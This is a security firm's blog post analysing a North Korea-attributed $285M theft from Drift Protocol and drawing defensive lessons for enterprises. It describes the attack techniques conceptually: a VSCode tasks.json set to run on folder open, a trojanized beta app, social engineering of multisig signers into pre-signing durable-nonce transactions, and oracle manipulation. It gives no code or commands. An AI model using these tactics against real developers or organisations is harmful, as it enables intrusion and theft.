How North Korea Stole $285M from Drift Protocol: The VSCode Supply Chain Technique Your Engineering Team Should Know About

On April 1, 2026, the largest hack of the year executed flawlessly. In twelve minutes, 31 coordinated transactions drained $285 million in USDC and JLP from Drift Protocol — the largest decentralized perpetual futures exchange on Solana. The attackers had been inside for six months.

Attribution to UNC4736, a North Korean state-sponsored financial theft group, came within 48 hours. This is the same unit that breached 3CX in 2023 via a supply chain attack on a trading application and stole $53M from Radiant Capital in October 2024. Their sophistication has not plateaued.

What makes this incident worth your attention — even if you have no exposure to DeFi or Solana — is the toolkit. The techniques used in this attack are not crypto-specific. The IDE supply chain vector, the long-con social engineering playbook, and the pre-signed authorization abuse all translate directly to enterprise environments. If your engineering team opens repositories from external contributors, your organization is in the same threat model.

The Six-Month Attack Timeline

This was not an opportunistic exploit. It was a patient, multi-phase operation that required sustained presence, parallel infrastructure construction, and precise timing across multiple attack vectors simultaneously.

The Five Attack Vectors — And Their Enterprise Equivalents

What makes this attack exceptional is the layered redundancy. Any single defensive control stopping one vector would not have prevented the breach — the attackers had multiple independent paths to the same outcome.

1. IDE Supply Chain: The VSCode tasks.json Technique

This is the vector that should concern every engineering organization immediately. The attackers shared a malicious VSCode project with Drift contributors. Inside that project was a weaponized tasks.json file using the "runOn": "folderOpen" configuration option.

The moment a developer opens the repository in VSCode or Cursor, the task executes. No user interaction, no obvious sign, no security warning in older versions. The same technique is the backbone of DPRK's "Contagious Interview" campaign that has been running since 2023 — where operatives pose as technical recruiters and ask candidates to clone and "review" a repository as part of a job interview.

The enterprise risk: Your developers open external repositories regularly — open source contributions, vendor integrations, interview take-home projects, freelancer code reviews. Any of these can carry this payload. It does not require the attacker to compromise a package registry or an upstream dependency. They just need to get someone to open the project folder.

Microsoft patched the unattended task execution behavior in VSCode 1.109 and 1.110. If your organization is running older versions — or if developers are using Cursor, which had the same vulnerability — this attack vector remains open.

2. TestFlight Supply Chain: The Trojanized Mobile App

A second contributor was compromised via a wallet application distributed through Apple's TestFlight beta testing platform. The app was either directly trojanized or replaced a legitimate app in the contributor's trust chain. This vector is harder to defend against — TestFlight applications bypass the App Store review process by design, and malicious applications in beta distribution are a known but underappreciated risk.

The enterprise risk: Engineering teams that use mobile applications for internal tools, MFA, or production access — especially beta-distributed applications — carry this exposure. This includes hardware wallet companion apps, internal ops tools, and infrastructure management apps distributed via MDM or beta testing programs.

3. Durable Nonce Pre-Signing: The Pre-Authorized Credential Trap

This is the financial mechanism of the heist, and it has a clear enterprise analogue. Solana transactions normally include a blockhash that expires in approximately two minutes. Durable nonces replace this with a fixed value stored on-chain, keeping a transaction valid indefinitely.

Attackers socially engineered members of Drift's Security Council — the 2-of-5 multisig body responsible for governance — into pre-signing what appeared to be routine governance transactions. These were actually durable nonce transactions. Weeks later, the attackers submitted those pre-signed authorizations in a completely different operational context, bypassing the multisig protection entirely.

The enterprise equivalent: Pre-approved change tickets, long-lived OAuth tokens, persistent API keys scoped to privileged operations, and "break glass" credentials that exist in a pre-authorized state waiting to be used. Social engineering an approver into pre-approving a change request is exactly the same attack pattern — just in a different domain. The 2-of-5 threshold also highlights a critical governance misconfiguration: a threshold that low, on a treasury controlling hundreds of millions, should have been 3-of-5 at minimum.

4. Oracle Manipulation: Manufacturing Trusted Data

The CarbonVote Token (CVT) operation is a textbook data integrity attack. Attackers minted 750 million CVT units, seeded minimal real liquidity, and used wash trading to manufacture a consistent ~$1 price signal over several weeks. Drift's price oracle — trusting the on-chain price data — treated CVT as legitimate collateral worth hundreds of millions of dollars.

The enterprise equivalent: Any system that trusts an external data feed without independent verification is vulnerable to this attack pattern. This includes: security tools that trust log aggregators that can be manipulated, SIEM rules that depend on external threat intel feeds, and configuration management systems that pull from sources an attacker has compromised. The attacker does not need to compromise the system directly — they only need to corrupt the data the system trusts.

5. Governance Destruction: Eliminating the Last Defense

The March 27 zero-timelock Security Council migration was not part of the financial theft itself — it was a preparatory step to eliminate the protocol's last line of defense. Drift's governance model originally included time delays on major parameter changes, giving the community time to detect and block malicious upgrades. By migrating the Security Council with a zero timelock, the attackers removed this safeguard twelve days before the final execution.

The enterprise equivalent: This mirrors the pattern of privilege escalation followed by defense removal that pentesters find in enterprise environments constantly. Compromised service accounts are used to modify SIEM alert thresholds, disable DLP policies, or approve changes that reduce detection coverage — all in preparation for the final payload. The most dangerous attacks are not ones that try to evade defenses. They are ones that successfully remove defenses before executing.

Understanding the DPRK Long-Con Playbook

UNC4736, also tracked as AppleJeus, Citrine Sleet, and Golden Chollima, is one of the most financially focused threat actors in the world. Unlike most nation-state groups whose primary objectives are espionage and data theft, DPRK's cyber operations have a direct revenue function — funding the North Korean state. Estimates put DPRK's cumulative crypto theft at over $3 billion since 2017.

The six-month timeline in the Drift attack is not unusual for DPRK operations. They are willing to invest months of sustained access — conference attendance, Telegram conversations, product testing, real capital deployment — to build the trust and operational position needed for a single high-value extraction. This patience is the defining characteristic that separates their operations from opportunistic criminal groups.

The use of non-North Korean intermediaries at the initial approach phase is also a consistent technique. It bypasses the geographic and behavioral anomaly detection that might flag a direct approach from a DPRK-associated identity. The real operatives enter later, after the relationship is already established.

What Your Engineering Team Needs to Do This Week

The Drift hack is a case study, not just a news story. If you run an engineering team that handles production infrastructure, customer data, or privileged access systems, these are not hypothetical risks.

• 1
  Update VSCode and Cursor on every developer machine today. Version 1.109+ patches the automatic task execution on folder open. This is a zero-interaction remote code execution vector. It is not hypothetical — it was used in this attack, and it has been used in Contagious Interview operations against hundreds of developers since 2023.
• 2
  Audit how your team handles external repositories. Do developers clone repos from vendors, contractors, open source projects, or interview candidates? Establish a policy: external repositories are opened in an isolated environment (container, VM, or at minimum a clean directory with workspace trust disabled in VSCode) before any review.
• 3
  Review your long-lived credential posture. Inventory all OAuth tokens, API keys, and pre-approved authorizations that remain valid indefinitely. DPRK's durable nonce technique applies to any credential or approval that can be exercised at an arbitrary future time. Long-lived credentials should have documented justification, rotation schedules, and scope limits.
• 4
  Audit your change approval thresholds. If your infrastructure changes require N-of-M approvals, review what N and M are, and whether social engineering 2 out of 5 approvers is a realistic attack surface. For high-impact changes (infrastructure modifications, IAM policy changes, security control modifications), consider raising thresholds and adding time delays before execution.
• 5
  Brief your technical team on Contagious Interview. DPRK specifically targets developers. The fake recruiter persona, the "technical assessment" repository, the "trading firm" partnership offer — these are documented approaches. Your senior engineers are the targets. They need to know what the social engineering lure looks like before they encounter it.
• 6
  Treat developer tooling as part of your attack surface. Your security team reviews your application's attack surface. Does it review your developers' development environment? IDE extensions, global npm packages, dotfiles, and shell configurations loaded in every terminal session are all code execution opportunities. DPRK found the VSCode config file more valuable than any web application vulnerability.

The Bigger Picture: DPRK Is Not Slowing Down

The Drift Protocol hack represents a continued evolution of DPRK's operational capability. Each major operation adds sophistication: the 3CX breach introduced supply chain compromise of a legitimate business application. The Radiant Capital hack refined the social engineering of multisig keyholders. The Drift operation combined developer tooling supply chain, governance manipulation, fake financial infrastructure, and pre-signed authorization abuse into a single coordinated campaign.

United Nations Security Council reports have documented DPRK stealing over $1.5 billion in cryptocurrency in 2024 alone. The revenue model works. The operational tempo is increasing. And the target list is expanding — DPRK is not exclusively targeting crypto. Their Contagious Interview campaign has been observed targeting developers at fintech companies, defense contractors, and enterprise software firms.

The $285M from Drift will fund North Korea's weapons program. The techniques they used to get it will be used again — possibly against a traditional enterprise, a startup with a valuable acquisition target, or a developer at your company who receives a LinkedIn message from a convincing recruiter offering a compelling technical challenge.

Lorikeet Security Team

Penetration Testing & Cybersecurity Consulting

We've completed 170+ security engagements across web apps, APIs, cloud infrastructure, and AI-generated codebases. Everything we publish here comes from patterns we see in real client work.